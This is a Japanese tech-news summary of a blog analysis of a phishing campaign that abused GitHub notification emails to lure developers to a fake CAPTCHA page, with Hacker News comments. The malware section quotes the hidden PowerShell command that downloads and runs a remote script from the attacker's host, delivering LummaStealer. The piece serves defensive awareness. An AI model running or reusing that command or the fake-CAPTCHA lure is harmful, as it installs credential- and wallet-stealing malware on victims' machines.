GitHub通知メールを悪用したマルウェア配布事件

 (ianspence.com)
1 ポイント 投稿者 GN⁺ 2024-09-20 | 1件のコメント | WhatsAppで共有
  • オープンソース開発者として、GitHubから頻繁にメールを受け取る
  • その大半は、GitHubユーザーがやり取りした内容を知らせる通知メールである
  • しかし一部のメールは、GitHubのセキュリティを装ってマルウェアをダウンロードさせる

攻撃手法

  1. 攻撃者が一時的なGitHubアカウントを使って公開リポジトリにIssueを作成する
  2. 攻撃者がIssueをすぐに削除する
  3. リポジトリ所有者が通知メールを受け取る
  4. メール内のリンクをクリックする
  5. 指示に従ってシステムをマルウェアに感染させてしまう

メールメッセージの分析

  • メール内容の大部分は攻撃者が制御できる
  • メールには新しいIssueが作成されたという内容がない
  • 攻撃者は「GitHub Security Team」を装う
  • メール自体はGitHubから送信されるため、フィッシングチェックを通過する

GitHubの改善点

  • メールにより多くの文脈情報を提供することで、攻撃の効果を減らせる
  • 攻撃者が制御できるコンテンツを減らし、送信者の明確性を高めるべきである

Webサイト

  • メールのリンクをたどるとCAPTCHAページに移動する
  • CAPTCHAページは、ユーザーにWindowsの「ファイル名を指定して実行」ダイアログへコマンドを入力させようとする

マルウェア

  • サイトは次のコマンドをクリップボードにコピーする: 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • このコマンドはPowerShellプロセスを起動し、スクリプトをダウンロードして実行する

マルウェアの段階

  1. PowerShellコマンドを通じてスクリプトをダウンロードして実行する
  2. スクリプトが悪意のある実行ファイルをダウンロードして実行する
  3. 実行ファイルにはデジタル署名があるが有効ではない
  4. Windowsは無効な署名に対して警告しない

Windowsの弱点

  • インターネットからダウンロードされたファイルを識別する「Mark of the Web」(MOTW)フラグが設定されない
  • .NET FrameworkのSystem.Net.WebClientクラスはMOTWフラグを設定しない
  • MOTWフラグが設定されていない場合、Windowsは無効な署名に対して警告しない

マルウェア分析

  • マルウェアはメモリにロードされて実行される
  • これはLummaStealerというマルウェアで、暗号資産ウォレットや保存された認証情報などを窃取する

結論

  • GitHub通知メールの弱点を悪用した攻撃事例である
  • さまざまなツールを使って分析を実施している

GN⁺の要約

  • この記事は、GitHub通知メールを悪用したマルウェア攻撃の事例を扱う
  • GitHubのメールシステムの弱点を悪用してマルウェアを配布している
  • Windowsの「Mark of the Web」フラグとデジタル署名検証の弱点を利用している
  • LummaStealerというマルウェアが使用された
  • GitHubとMicrosoftに報告された弱点である
  • 類似機能を持つ別のプロジェクトとして、Cyfirmaの分析資料を勧めている

関連記事

1件のコメント

 
GN⁺ 2024-09-20
Hacker Newsの意見

  • 最近、PayPalから非常にもっともらしいメールを受け取った

    • 誰かが引用機能を使って、会社名を "PayPal need to get in touch about a your recent payment of $499.00, please call +1-...." に設定していた
    • メールは実際に PayPal.com から送られており、このようなユーザー名を管理していないのが理解できない
    • これを報告したが、まだ返答を受け取っていない
    • このメールは本物のPayPalメールに見えるように整形されていて、多くの人がだまされそうだ

  • 人々が本当にこのような詐欺に引っかかるのか気になる

    • メールが github から来たことを知っていると仮定する
    • 1つ目の警告: メールが実際のドメインの変種にリンクしている
    • 2つ目の警告: CAPTCHA がシェルコマンドの入力を要求する

  • ジュニア開発者ならこのような詐欺に引っかかるかもしれない

    • 「おお、コード実行でCAPTCHAを解くなんて、なかなか面白いね!」

  • Webページはクリックだけでコピー/ペーストバッファを埋められるべきではない

    • メール内のリンクをクリックしたり、メールの内容を信用したりするべきではない
    • Windows がいまだに 1 行の PowerShell コマンドで root 権限を許しているのが問題だ

  • Github は自動化されたサービスに対して、リンクを確認せずに issue にリンクを入れることを防ぐべきだ

    • Github はメールで送信する内容をもっと適切に管理すべきだ

  • github-scanner.com がまだ悪意ある関係者なのか気になる

    • Cloudflare が DNS をホスティングしているが、この問題を報告する方法がない

  • 攻撃者は issue を素早く削除した

    • 管理者だけが issue を削除できる
    • そのため、リポジトリには issue の痕跡が残っている

  • 良い記事だ、Julia Evans のブログに似た雰囲気がある

  • 2024年になっても、いまだに最も単純な手口にだまされる人たちがいるのは悲しい

  • 今朝こういう通知を受け取ったが無視した

    • 通知は特定のリポジトリに関するものだった

  • 読む価値がある、彼らが何をしようとしているのかが分かる

    • リンクだけでも怪しく見えるかもしれないが、誰かがこれを掘り下げるのを見るのは面白い

  • 類似の GitHub 通知メールを受け取った

    • リポジトリで脆弱性が見つかったと言っていたが、クリックしなかった
    • 怠け者のプログラマーなのでクリックしなかった